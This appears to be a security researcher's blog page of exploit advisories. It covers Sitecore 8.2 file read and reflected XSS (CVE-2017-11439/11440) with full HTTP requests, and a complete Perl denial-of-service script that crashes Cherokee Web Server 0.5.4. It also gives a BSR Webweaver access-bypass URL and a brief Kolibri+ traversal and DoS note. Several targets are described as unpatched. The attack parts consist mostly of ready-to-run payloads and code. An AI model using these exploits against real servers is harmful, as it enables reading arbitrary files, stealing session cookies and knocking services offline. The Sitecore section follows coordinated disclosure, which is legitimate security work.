Sitecore CMS v 8.2, cross site scripting & arbitrary file access

Hi folks,

Multiple vulnerabilities were found in the Sitecore version 8.2. Which were reported to Sitecore CMS on the 5th of May,2017. A patch was released on the 27th of June, 2017. It is recommended to update the Sitecore CMS installation. The exploit is being made public after the patch has been released.

Exploit:[CVE-2017-11439, CVE-2017-11440]

Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net

Disclaimer: Everything mentioned below is for educational puposes. The vulnerability details are mentioned as is. I would not be held responsible for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product. The vulnerabilities include two instances of arbitrary file access and once instance of reflected cosssite scripting.

1: Arbitrary file access:

– Description:

The vulnerability lies in the tools which can be accessed via the administrator user. The vulnerability exists because there is no bound check for absolute path in the application, that is, if the absolute path is provided to the vulnerable URL, it reads the path and shows the contents of the file requested.

– Exploit:
1. Once authenticated as the administrator perform a GET request to the followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini

2. Once authenticated as the administrator perform a POST request to the followiung URL:

POST /sitecore/admin/LinqScratchPad.aspx HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= <OMITTED> &__VIEWSTATEGENERATOR= <OMITTED> &__EVENTVALIDATION= <OMITTED> &LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%5Cwin.ini&Fetch=

 

2. Reflected Cross-site Scripting:
– Description:
The application does not sanatize the USER input which allows a normal authenticated user to exploit this vulnerability.

 

– Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A// <OMITTED> /sitecore/shell/Applications/Tools/Run&__CSRFTOKEN= <OMITTED> &__VIEWSTATE= <OMITTED> &__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(document.cookie)%3B%22%3E%3C%2Fiframe%3E

++++++++++++++++++++++++++++++++++++++++++++++++++++

Time-Line:

  • Initial inquiry – May 5, 2017
  • Vulnerability advisory submission – May 5, 2017
  • Patch release – June 27, 2017
  • Publicly released – July 3, 2017

 

 

Cherokee Web Server 0.5.4 Denial Of Service

#######################################################
#
# Name : Cherokee Web Server 0.5.4 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website:  Xc0re.net
# DATE: 25/10/09
# Tested on Windows !
#######################################################

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

[*] Download Page : http://www.cherokee-project.com/download/windows/

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server , the server crashes !

[*] Exploitation :

#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = “AUX”;

$stuff = “GET /”.$packet.” HTTP/1.1\r\n” .
“User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n” .
“Host:127.0.0.1\r\n”.
“Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n”.
“Accept-Language: en-US,en;q=0.9\r\n”.
“Accept-Charset: iso-8859-1,*,utf-8\r\n”.
“Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n”;

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n”;
print “+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

exit;
}

$sock = IO::Socket::INET->new( Proto => “tcp”,PeerAddr => $host , PeerPort => $PORT) || die “Cant connect to $host!”;
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n”;
print “+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

print “\n”;

print “[*] Initializing\n”;

sleep(2);

print “[*] Sendin DOS Packet \n”;

send ($sock , $stuff , 0);
print “[*] Crashed 🙂 \n”;
$res = recv($sock,$response,1024,0);
print $response;

exit;

BSR Webweaver 1.33 /script security Bypass vulnerability

BSR Webweaver 1.33

Author : Usman Saeed , Exploit @ Xc0re Security Research Group.

[*] Date: 15/09/09

[*] http://www.brswebweaver.com/downloads.html

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.
This is the reason this exploit is not called a Directory Listing Exploit !

[*] Exploitation :

[+] http://[host]/scripts/%bg%ae%bg%ae/.exe

Kolibri+ Webserver 2 Multiple Vulnerabilities

Kolibri+ Webserver 2 suffers from multiple vulnerabilities namely Directory Traversal &  Denial OF Service. Vulnerability was reported on 6th of September 2009 by Xc0re Security Research Group.

http://xc0re.net/index.php?p=1_19_Kolibri+-Webserver-2-multiple-vulnerabilities

An attacker can easily crash the server , or send a crafted http request to escape the root directory and view any file , even outside the root directory.